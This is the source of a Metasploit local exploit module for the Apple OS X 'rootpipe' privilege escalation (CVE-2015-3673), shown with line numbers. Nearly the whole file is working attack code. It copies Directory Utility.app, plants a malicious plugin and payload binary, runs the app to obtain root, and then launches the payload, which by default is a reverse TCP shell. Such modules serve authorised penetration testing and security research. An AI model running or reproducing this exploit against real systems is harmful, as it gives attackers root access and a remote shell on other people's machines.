Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = GreatRanking
8

9
  include Msf::Post::File
10
  include Msf::Post::OSX::Priv
11
  include Msf::Post::OSX::System
12
  include Msf::Exploit::EXE
13
  include Msf::Exploit::FileDropper
14

15
  def initialize(info = {})
16
    super(update_info(info,
17
      'Name'           => 'Apple OS X Entitlements Rootpipe Privilege Escalation',
18
      'Description'    => %q{
19
        This module exploits the rootpipe vulnerability and bypasses Apple's initial
20
        fix for the issue by injecting code into a process with the 'admin.writeconfig'
21
        entitlement.
22
      },
23
      'Author'         => [
24
        'Emil Kvarnhammar', # Vulnerability discovery and PoC
25
        'joev'              # Copy/paste monkey
26
      ],
27
      'References'     => [
28
        ['CVE',   '2015-3673'],
29
        ['URL',   'https://truesecdev.wordpress.com/2015/07/01/exploiting-rootpipe-again/']
30
      ],
31
      'DisclosureDate' => '2015-07-01',
32
      'License'        => MSF_LICENSE,
33
      'Platform'       => 'osx',
34
      'Arch'           => ARCH_X64,
35
      'SessionTypes'   => ['shell'],
36
      'Privileged'     => true,
37
      'Targets'        => [
38
        ['Mac OS X 10.9-10.10.3', {}]
39
      ],
40
      'DefaultTarget'  => 0,
41
      'DefaultOptions' => {
42
        'PAYLOAD'         => 'osx/x64/shell_reverse_tcp',
43
        'PrependSetreuid' => true
44
      }
45
    ))
46

47
    register_options [
48
      OptString.new('WRITABLEDIR', [true, 'Writable directory', '/.Trashes'])
49
    ]
50
  end
51

52
  def base_dir
53
    datastore['WritableDir'].to_s
54
  end
55

56
  def check
57
    if ver? && is_admin?
58
      vprint_status("Version is between 10.9 and 10.10.3, and is admin.")
59
      return CheckCode::Appears
60
    else
61
      return CheckCode::Safe
62
    end
63
  end
64

65
  def exploit
66
    if is_root?
67
      fail_with Failure::BadConfig, 'Session already has root privileges'
68
    end
69

70
    unless is_admin?
71
      fail_with Failure::NoAccess, "User is not in the 'admin' group, bailing."
72
    end
73

74
    if check != CheckCode::Appears
75
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
76
    end
77

78
    unless writable? base_dir
79
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
80
    end
81

82
    print_status("Copying Directory Utility.app to #{new_app}")
83
    cmd_exec("cp -R '/System/Library/CoreServices/Applications/Directory Utility.app' '#{new_app}'")
84
    cmd_exec("mkdir -p '#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/MacOS'")
85

86
    print_status("Writing bundle plist to `#{plist_file}'")
87
    write_file(plist_file, plist)
88

89
    print_status("Writing payload to `#{payload_file}'")
90
    write_file(payload_file, binary_payload)
91
    register_file_for_cleanup(payload_file)
92

93
    print_status("Writing malicious shared library to `#{exploit_file}'")
94
    write_file(exploit_file, plugin_exploit)
95

96
    print_status("Running Directory Utility.app")
97
    cmd_exec("/bin/sh -c 'PAYLOAD_IN=#{payload_file} PAYLOAD_OUT=#{root_file} #{new_app}/Contents/MacOS/Directory\\ Utility'")
98

99
    print_status("Deleting Directory Utility.app")
100
    cmd_exec("rm -Rf '#{new_app}'")
101

102
    print_status('Executing payload...')
103
    cmd_exec("/bin/sh -c '#{root_file} &'")
104
  end
105

106
  def ver?
107
    Rex::Version.new(get_sysinfo['ProductVersion']).between?(
108
      Rex::Version.new('10.9'), Rex::Version.new('10.10.3')
109
    )
110
  end
111

112
  def sploit
113
    "#{datastore['PYTHON']} #{exploit_file} #{payload_file} #{payload_file}"
114
  end
115

116
  def plugin_exploit
117
    File.read(File.join(
118
      Msf::Config.data_directory, 'exploits', 'CVE-2015-3673', 'exploit.daplug'
119
    ))
120
  end
121

122
  def binary_payload
123
    Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
124
  end
125

126
  def exploit_file
127
    "#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/MacOS/RootpipeBundle"
128
  end
129

130
  def plist_file
131
    "#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/Info.plist"
132
  end
133

134
  def new_app
135
    @app ||= "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}.app"
136
  end
137

138
  def plist
139
    %Q|
140
      <?xml version="1.0" encoding="UTF-8"?>
141
      <plist version="1.0">
142
      <dict>
143
        <key>CFBundleGetInfoString</key>
144
        <string>RootpipeBundle</string>
145
        <key>CFBundleExecutable</key>
146
        <string>RootpipeBundle</string>
147
        <key>CFBundleIdentifier</key>
148
        <string>com.root.pipe</string>
149
        <key>CFBundleName</key>
150
        <string>RootpipeBundle</string>
151
        <key>CFBundleShortVersionString</key>
152
        <string>0.01</string>
153
        <key>CFBundleInfoDictionaryVersion</key>
154
        <string>6.0</string>
155
        <key>CFBundlePackageType</key>
156
        <string>APPL</string>
157
        <key>IFMajorVersion</key>
158
        <integer>0</integer>
159
        <key>IFMinorVersion</key>
160
        <integer>1</integer>
161
      </dict>
162
      </plist>
163
    |
164
  end
165

166
  def payload_file
167
    @payload_file ||=
168
      "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}"
169
  end
170

171
  def root_file
172
    @root_file ||=
173
      "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}"
174
  end
175
end
176

177